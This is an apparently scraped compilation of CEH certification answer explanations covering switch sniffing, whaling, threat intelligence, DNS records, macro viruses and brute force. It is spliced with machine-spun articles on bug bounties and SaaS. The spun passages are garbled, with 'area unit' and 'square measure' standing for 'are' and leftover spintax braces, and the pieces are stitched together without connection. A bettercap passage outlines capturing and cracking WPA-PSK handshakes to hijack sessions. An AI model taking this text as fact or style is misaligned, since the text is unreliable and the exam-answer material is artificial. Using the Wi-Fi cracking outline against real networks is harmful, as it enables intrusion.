The other options are less likely or less effective techniques for sniffing a switched Ethernet network. Compromising physical security to plug into the network directly may allow the attacker to sniff the traffic of the device they are connected to, but not the traffic of other devices on the network. Using a Trojan horse with in-built sniffing capability may allow the attacker to sniff the traffic of the infected device, but not the traffic of other devices on the network, unless the Trojan horse also performs MAC flooding or other techniques to bypass the switch. Using passive sniffing, which involves listening to the network traffic without sending any packets, may provide significant stealth advantages, but it does not help the attacker to see the traffic of other devices on the network, unless the switch is already in fail-open mode or the attacker uses other techniques to induce it. 

Gathering Information using Reverse Image Search Reverse image search helps an attacker in tracking the original source and details of images, such as photographs, profile pictures, and memes Attackers can use online tools such as Google Image Search, TinEye Reverse Image Search, and Yahoo Image Search to perform reverse

Bug bounty programs allow independent security researchers to report bugs to an companies and receive rewards or compensation. These bugs area unit sometimes security exploits and vulnerabilities, although they will additionally embody method problems, hardware flaws, and so on.

The reports area unit usually created through a program travel by associate degree freelance third party (like Bugcrowd or HackerOne). The companies can got wind of (and run) a program curated to the organization’s wants.

Programs is also non-public (invite-only) wherever reports area unit unbroken confidential to the organization or public (where anyone will sign in and join). they will happen over a collection timeframe or with without stopping date (though the second possibility is a lot of common).

Who uses bug bounty programs?

Many major organizations use bug bounties as an area of their security program, together with AOL, Android, Apple, Digital Ocean, and goldman Sachs. you’ll read an inventory of all the programs offered by major bug bounty suppliers, Bugcrowd and HackerOne, at these links.

Why do corporations use bug bounty programs?

Bug bounty programs provide corporations the flexibility to harness an outsized cluster of hackers so as to seek out bugs in their code.

This gives them access to a bigger variety of hackers or testers than they’d be able to access on a one-on-one basis. It {can also|also will|can even|may also|may} increase the probabilities that bugs area unit found and reported to them before malicious hackers can exploit them.

It may also be an honest publicity alternative for a firm. As bug bounties became a lot of common, having a bug bounty program will signal to the general public and even regulators that a corporation incorporates a mature security program.

This trend is likely to continue, as some have began to see bug bounty programs as an business normal that all companies ought to invest in.

Why do researchers and hackers participate in bug bounty programs?

Finding and news bugs via a bug bounty program may end up in each money bonuses and recognition. In some cases, it will be a good thanks to show real-world expertise once you are looking for employment, or will even facilitate introduce you to parents on the protection team within an companies.

This can be full time income for a few of us, income to supplement employment, or the way to point out off your skills and find a full time job.

It may also be fun! it is a nice (legal) probability to check out your skills against huge companies and government agencies.

What area unit the disadvantages of a bug bounty program for independent researchers and hackers?

A lot of hackers participate in these varieties of programs, and it will be tough to form a major quantity of cash on the platform.

In order to say the reward, the hacker has to be the primary person to submit the bug to the program. meaning that in apply, you may pay weeks searching for a bug to use, solely to be the person to report it and build no cash.

Roughly ninety seven of participants on major bug bounty platforms haven’t sold-out a bug.

In fact, a 2019 report from HackerOne confirmed that out of quite three hundred,000 registered users, solely around two.5% received a bounty in their time on the platform.

Essentially, most hackers are not creating a lot of cash on these platforms, and really few square measure creating enough to switch a full time wage (plus they do not have advantages like vacation days, insurance, and retirement planning).

What square measure the disadvantages of bug bounty programs for organizations?

These programs square measure solely helpful if the program ends up in the companies realizeing issues that they weren’t able to find themselves (and if they’ll fix those problems)!

If the companies is not mature enough to be able to quickly rectify known problems, a bug bounty program is not the right alternative for his or her companies.

Also, any bug bounty program is probably going to draw in an outsized range of submissions, several of which can not be high-quality submissions. a corporation must be ready to cope with the exaggerated volume of alerts, and also the risk of a coffee signal to noise magnitude relation (essentially that it’s probably that they’re going to receive quite few unhelpful reports for each useful report).

Additionally, if the program does not attract enough participants (or participants with the incorrect talent set, and so participants are not able to establish any bugs), the program is not useful for the companies.

The overwhelming majority of bug bounty participants consider web site vulnerabilities (72%, per HackerOn), whereas solely a number of (3.5%) value more highly to seek for package vulnerabilities.

This is probably because of the actual fact that hacking in operation systems (like network hardware and memory) needs a big quantity of extremely specialised experience. this implies that firms may even see vital come on investment for bug bounties on websites, and not for alternative applications, notably those that need specialised experience.

This conjointly implies that organizations which require to look at AN application or web site among a selected time-frame may not need to rely on a bug bounty as there is no guarantee of once or if they receive reports.

Finally, it are often probably risky to permit freelance researchers to try to penetrate your network. this could end in public speech act of bugs, inflicting name harm within the limelight (which could end in individuals not eager to purchase the organizations’ product or service), or speech act of bugs to additional malicious third parties, United Nations agency may use this data to focus on the organization.

Comprehensive and Detailed Explanation:

The AAAA (Quad A) record is the DNS record type used to map a domain name to an IPv6 address. It is the IPv6 equivalent of an A (Address) record, which maps to an IPv4 address.

From CEH v13 Courseware:

Module 4: Enumeration → DNS Record Types

bettercap is a tool that can perform session hijacking attacks on wireless networks, among other network security and penetration testing tasks. bettercap can capture and manipulate network traffic, perform man-in-the-middle attacks, spoof and sniff protocols, inject custom payloads, and more1.

bettercap can perform session hijacking attacks on wireless networks that use the WPA-PSK security protocol by exploiting the four-way handshake process that occurs when a client connects to a wireless access point. The four-way handshake is used to establish a shared encryption key between the client and the access point, based on the pre-shared key (PSK) that is configured on both devices. However, the four-way handshake also exposes some information that can be used to crack the PSK offline, such as the nonce values, the MAC addresses, and the message integrity code (MIC) of the packets2.

bettercap can capture the four-way handshake packets using its Wi-Fi module and save them in a file. The file can then be fed to a tool like Hashcat or Aircrack-ng to crack the PSK using brute force or dictionary attacks. Once the PSK is obtained, bettercap can use it to decrypt the wireless traffic and perform session hijacking attacks on the clients connected to the access point3.

Therefore, bettercap is an appropriate tool to carry out a session hijacking attack on a wireless network that uses the WPA-PSK security protocol.

Whaling is an advanced social engineering technique that targets high-profile individuals, such as executives, managers, or celebrities, by impersonating them or someone they trust, such as a colleague, partner, or vendor. The attacker creates a fake Linkedin profile, pretending to be a high-ranking official from a well-established company, and uses it to connect with other employees within the organization. The attacker then leverages the trust and authority of the fake profile to gain access to exclusive corporate events and proprietary project details shared within the network. This way, the attacker can launch targeted attacks against the organization, such as stealing sensitive data, compromising systems, or extorting money.

The most likely immediate threat to the organization is the loss of confidential information and intellectual property, which can damage the organization’s reputation, competitiveness, and profitability. The attacker can also use the information to launch further attacks, such as ransomware, malware, or sabotage, against the organization or its partners and customers.

The other options are not as accurate as whaling for describing this scenario. Pretexting is a social engineering technique that involves creating a false scenario or identity to obtain information or access from a victim. However, pretexting usually involves direct communication with the victim, such as a phone call or an email, rather than creating a fake Linkedin profile and connecting with the victim’s network. Spear phishing is a social engineering technique that involves sending a personalized and targeted email to a specific individual or group, usually containing a malicious link or attachment. However, spear phishing does not involve creating a fake Linkedin profile and connecting with the victim’s network. Baiting and involuntary data leakage are not social engineering techniques, but rather possible outcomes of social engineering attacks. Baiting is a technique that involves offering something enticing to the victim, such as a free download, a gift card, or a job opportunity, in exchange for information or access. Involuntary data leakage is a situation where the victim unintentionally or unknowingly exposes sensitive information to the attacker, such as by clicking on a malicious link, opening an infected attachment, or using an unsecured network. References:

Whaling: What is a whaling attack?

Advanced Social Engineering Attack Techniques

Top 8 Social Engineering Techniques and How to Prevent Them

Operational Threat Intelligence provides insights into specific attacker methodologies, motivations, and campaigns. It involves gathering contextual information from real-world attacks, open-source intelligence (OSINT), social media, dark web forums, chat rooms, and human intelligence (HUMINT).

As per CEH v13 Official Courseware:

Operational intelligence is primarily used by security teams to anticipate specific incoming attacks.

It helps provide actionable information such as:

Who is attacking?

Why are they attacking?

What methods are they using?

What infrastructure is involved?

Incorrect Options:

A. Strategic Threat Intelligence is high-level, focusing on long-term trends and business risks.

B. Tactical Threat Intelligence is focused on TTPs (Tactics, Techniques, and Procedures) of known threats, primarily for defenders and analysts.

D. Technical Threat Intelligence includes IoCs like IPs, hashes, and URLs, often short-lived and used for detection systems.

Reference – CEH v13 Official Courseware:

Module 01: Introduction to Ethical Hacking

Section: "Types of Threat Intelligence"

Table: “Strategic vs Tactical vs Operational vs Technical Intelligence”

===========

A macro virus is a virus that is written in a macro language: a programming language which is embedded inside a software application (e.g., word processors and spreadsheet applications). Some applications, such as Microsoft Office, allow macro programs to be embedded in documents such that the macros are run automatically when the document is opened, and this provides a distinct mechanism by which malicious computer instructions can spread. (Wikipedia)

NB: The virus Melissa is a well-known macro virus we could find attached to word documents.

https://nmap.org/nsedoc/scripts/enip-info.html

Example Usage enip-info:

- nmap --script enip-info -sU -p 44818

This NSE script is used to send a EtherNet/IP packet to a remote device that has TCP 44818 open. The script will send a Request Identity Packet and once a response is received, it validates that it was a proper response to the command that was sent, and then will parse out the data. Information that is parsed includes Device Type, Vendor ID, Product name, Serial Number, Product code, Revision Number, status, state, as well as the Device IP.

This script was written based of information collected by using the the Wireshark dissector for CIP, and EtherNet/IP, The original information was collected by running a modified version of the ethernetip.py script (https://github.com/paperwork/pyenip)

Software as a service (SaaS) allows users to attach to and use cloud-based apps over the web. Common examples ar email, calendaring and workplace tool (such as Microsoft workplace 365).

SaaS provides a whole software solution that you get on a pay-as-you-go basis from a cloud service provider. You rent the use of an app for your organisation and your users connect with it over the web, typically with an internet browser. All of the underlying infrastructure, middleware, app software system and app knowledge ar located within the service provider’s knowledge center. The service provider manages the hardware and software system and with the appropriate service agreement, can make sure the availability and also the security of the app and your data as well. SaaS allows your organisation to induce quickly up and running with an app at token upfront cost.

Common SaaS scenarios

This tool having used a web-based email service like Outlook, Hotmail or Yahoo! Mail, then you have got already used a form of SaaS. With these services, you log into your account over the web, typically from an internet browser. the e-mail software system is found on the service provider’s network and your messages ar hold on there moreover. you can access your email and hold on messages from an internet browser on any laptop or Internet-connected device.

The previous examples are free services for personal use. For organisational use, you can rent productivity apps, like email, collaboration and calendaring; and sophisticated business applications like client relationship management (CRM), enterprise resource coming up with (ERP) and document management. You buy the use of those apps by subscription or per the level of use.

Advantages of SaaS

Gain access to stylish applications. to supply SaaS apps to users, you don’t ought to purchase, install, update or maintain any hardware, middleware or software system. SaaS makes even sophisticated enterprise applications, like ERP and CRM, affordable for organisations that lack the resources to shop for, deploy and manage the specified infrastructure and software system themselves.

Pay just for what you utilize. you furthermore may economize because the SaaS service automatically scales up and down per the level of usage.

Use free shopper software system. Users will run most SaaS apps directly from their web browser without needing to transfer and install any software system, though some apps need plugins. this suggests that you simply don’t ought to purchase and install special software system for your users.

Mobilise your hands simply. SaaS makes it simple to “mobilise” your hands as a result of users will access SaaS apps and knowledge from any Internet-connected laptop or mobile device. You don’t ought to worry concerning developing apps to run on differing types of computers and devices as a result of the service supplier has already done therefore. additionally, you don’t ought to bring special experience aboard to manage the safety problems inherent in mobile computing. A fastidiously chosen service supplier can make sure the security of your knowledge, no matter the sort of device intense it.

Access app knowledge from anyplace. With knowledge hold on within the cloud, users will access their info from any Internet-connected laptop or mobile device. And once app knowledge is hold on within the cloud, no knowledge is lost if a user’s laptop or device fails.

Brute-force attack when an attacker uses a set of predefined values to attack a target and analyze the response until he succeeds. Success depends on the set of predefined values. It will take more time if it is larger, but there is a better probability of success. In a traditional brute-force attack, the passcode or password is incrementally increased by one letter/number each time until the right passcode/password is found.

Comprehensive and Detailed Explanation:

An Information Security Policy (ISP) is a high-level document that defines:

What employees can and cannot do with IT systems.

What data is protected and how.

The consequences of policy violations.

The company's commitment to security.

It must be signed by users to enforce compliance and protect organizational assets.

From CEH v13 Courseware:

Module 20: Information Security Policies

Module 1: Governance, Risk, and Compliance